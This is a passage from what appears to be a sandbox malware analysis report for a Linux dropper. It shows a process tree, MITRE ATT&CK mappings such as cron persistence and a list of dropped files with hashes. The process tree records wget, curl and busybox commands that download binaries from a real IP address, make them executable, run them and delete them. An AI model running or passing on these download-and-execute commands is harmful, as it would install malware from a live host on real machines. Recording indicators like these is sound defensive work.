  2⤵
  - File and Directory Permissions Modification
  PID:1011
- /tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  ./MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:1012
- /bin/rm
  rm MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:1014
- /usr/bin/wget
  wget http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:1015
- /usr/bin/curl
  curl -O http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  - Reads runtime system information
  PID:1016
- /bin/busybox
  /bin/busybox wget http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  - Writes file to tmp directory
  PID:1017
- /bin/chmod
  chmod 777 MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  - File and Directory Permissions Modification
  PID:1018
- /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  ./MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:1019
- /bin/rm
  rm MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:1020
- /usr/bin/wget
  wget http://37.44.238.92/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:1021

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki

Filesize
111KB

MD5
701e7a55a4f3650f5feee92a9860e5fc

SHA1
6ce4a7f0dc80fe557a0ace4de25e6305af221ed4

SHA256
ff851250b0bd7e6f2c445b08d858d840b554caf75a37ada2a970ea4d317ba588

SHA512
7352517b4af3b0cfe1cc814accf18e6254532f33dee274279bd499b6748aa0ed044c9429d6df0eb07ff0292cd0f9388ce44d278e0c562e6e57110b28a66a5f11

Download Submit
/tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv

Filesize
117KB

MD5
849fa04ef88a8e8de32cb2e8538de5fe

SHA1
c768af29fe4b6695fff1541623e8bbd1c6f242f7

SHA256
8bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579

SHA512
2d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf

Download Submit
/tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa

Filesize
71KB

MD5
3e0b52758195857c6f9afd2d57aa8c34

SHA1
2a2299176897d01e81d4a50a32c105f39eddebb6

SHA256
a60952be2e5d8544569841ac116adbf2d69cb76a117e17c775402dd1da050b52

SHA512
580eb3cf98267011455e0fe04664566d4dfc9cd86fb9340260605fb3a4db214b2bfd89b1544f11766d71787c4839591b4e0b18a4ba9892a25fe4432f33b37687

Download Submit
/tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75

Filesize
74KB

MD5
df90d23a27703b304995d451a53c1806

SHA1
2fbe30499e8170052146a98e5cb3bd05d014ae26

SHA256
068f0256a573bb65aa3d1bf0b58789ee21407e76f4ece5f2ca5da67e521ca153

SHA512
15425e881f9eb0a6204446a8392e864f42bf92886ebb6313e0afc1cb20fa383bd3ceffd714c569c66daa849e6a52ee5dfbb32dac5d0abb6983f42b99199a0653

Download Submit
/tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75

Filesize
69KB

MD5
f089c9e7f8bfc623825ca535e375476d

SHA1
d0088f8c350043051261fe8856dd14cd42f53fe8

SHA256
87e933ba328d4ca92ddef3135b33e5110b771720a6de71c910d157c131c79910

SHA512
1d0fe4eaa7e9c72967396ba9773e176999330bf7be495bdd3c12978724d3809c0e8707014f58181b806b6e4ad6362968993551f14dcf510aeb5e31df4930d90d

Download Submit
/tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA

Filesize
151KB

MD5
3c90d5820bddcf7c5d1bd21dfa49d958

SHA1
5ba05bd489e50af97d6dc45e3a0be60e494d5083

SHA256
bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2

SHA512
54a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a

Download Submit
/tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA

Filesize
145KB

MD5
8cdaaf6355b1a18d2696211c524f7412

SHA1
657e38fc66a09f33e40ee1b76f6caaf43b014f99

SHA256
3b628db2db02c196263b0468592b4afbb88adf06df2c0343f2d64a16b7213f84

SHA512
ca98a81eaf6ba83f2e0ff5481c111c191c99734ac1f87786b433720f134272269fdb64fc519f6af8fc0f4eae81f4edcb2f90ad6feb80ace2538e2cd27e024fae

Download Submit
/tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q

Filesize
158KB

MD5
a0f54292dbd5e0960908af60210a6ba3

SHA1
b795e0835308538c43d81e72ba50200cd880557a

SHA256
def96198e54ecd112dd9640886b13bd35aa8967e1b2e52e9c854aeae22040040

SHA512
f3aaf67dd305025b9c9a0d5a6d0af48006eaae1c2e13e14d61cde7aedc547bec41e5c29cb4355fb2ffe8dbbd8824eb157ced8bf8815e9c5d789c93d78b761c40

Download Submit
/tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f

Filesize
79KB

MD5
c25743c28079354643168afaaff20cc6

SHA1
256da5229118b151de01c9e5b2fbf9799ed93ea0

SHA256
e9794b7dd733cd045a311df7b13a59bd064d5847f301c92e479a19cfa486b49d

SHA512
23bdcea46de5fec7c21b195e2d9cd57224940ea3214dd546b1a18bb7e062bbbb1a2fe90c7559eb5917cb673ae7afcc0b55e0fb3c8f8ef583a0414e6b9d646912

Download Submit
/tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX

Filesize
119KB

MD5
1b166b95f9cb4b079ef1b9ec8363ddf3

SHA1
0d8eb08add467b3b5474f9b25909297fe7c2839c

SHA256
94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

SHA512
983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

Download Submit
/tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E

Filesize
99KB

MD5
9438d9bc392bcf300a5583b6df5bc8f6

SHA1
375a6ae34b516f6f3eeea8030c4084f585017efa

SHA256
68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

SHA512
1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

Download Submit
/tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb

Filesize
69KB

MD5
5586cc41e93180895e0a1f0cde4b30b9

SHA1
3e0617083ae680b1a3c199717ffeb5a17002ab73

SHA256
6f6fb24366f97b9ca616f1e5e03f7a7116bee9affd9541c66561220342a65b4a

SHA512
df75b83a642324e5e3ff8196b9a7b8bb39caa40a7f2b458c47567bbda0ed7ba1db8ca97f34eba40ec474ec707fa5b965a3789be8490d6d255286a171dba15bb6

Download Submit
/tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G

Filesize
107KB

MD5
eb9c3a0de91fcf16ba17cb24608df68c

SHA1
09d95a7d70d5e115d103be51edff7c498d272fac

SHA256
dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

SHA512
9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

Download Submit
/tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR

Filesize
87KB

MD5
d627a20a16c92a50d09b5bd8f7d8b315

SHA1
1669e9b07fb815ade2e16f2ee9fa617305b7ebc1

SHA256
fe225fc17fe1c8e92f0de94401192cccadc1cd212df7461d34408ea321a60b5d

SHA512
938a691a716c4f5a0eef1ef8c5e9b1e423c18dd4a2d5806d4dbba537bc6604e48199aeba5fa8395b3cefd39afe812531bde0d896994317b6487797fb42ce8936

Download Submit
/tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q

Filesize
145KB

MD5
1ffe5f2d6ce6bffb4077eb6ef80e4f6b

SHA1
6dabd7b13c18cd3b47ce3d9dd9cf8a4a52453ef4

SHA256
05753d9c9a43b4e5d58205998a29766813cf7abf9c0864a7d8ac72ddcfadb44e

SHA512
0d29498ca902ab5dd94325647f5edbc2588b4a6129fbd498ec2fbd26b22ff17f9c9fa53e1a5b18da4e9a150816f2f5081cacc67830176449d3114ccba8a19379

Download Submit
/tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit
/var/spool/cron/crontabs/tmp.lAyrTE

Filesize
210B

MD5
f56144bfde1f6ec6b1b19fb6fe06878e

SHA1
0d4965f1025176d8f66fa572bf44dadb39857cf0

SHA256
1c62e6f52fb7f6d9cbbc33b3ad33a8208ac6059ce2410b02b678b772241f9ca6

SHA512
2d135571d437a6f059ae04766ac582a919b7576461d1cd79325aa1d3826b3ae48c2d8c231cc855f3a9500e429eee21aa702a35643b099fcbf3168da6144d76bb

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads